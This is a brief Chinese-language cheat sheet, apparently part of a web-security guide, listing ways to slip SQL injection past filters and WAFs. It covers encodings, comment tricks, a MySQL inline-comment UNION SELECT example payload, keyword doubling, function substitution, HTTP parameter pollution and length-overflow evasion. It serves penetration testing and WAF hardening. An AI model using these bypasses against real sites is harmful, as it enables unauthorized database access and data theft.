4.1.5. 绕过技巧¶
- 编码绕过
大小写
url编码
html编码
十六进制编码
unicode编码
- 注释
//
--
-- +
-- -
#
/**/
;%00
内联注释用的更多,它有一个特性
/!**/
只有MySQL能识别e.g.
index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
- 只过滤了一次时
union
=>ununionion
- 相同功能替换
- 函数替换
substring
/mid
/sub
ascii
/hex
/bin
benchmark
/sleep
- 变量替换
user()
/@@user
- 符号和关键字
and
/&
or
/|
- HTTP参数
- HTTP参数污染
id=1&id=2&id=3
根据容器不同会有不同的结果
HTTP分割注入
- 缓冲区溢出
一些C语言的WAF处理的字符串长度有限,超出某个长度后的payload可能不会被处理
二次注入有长度限制时,通过多句执行的方法改掉数据库该字段的长度绕过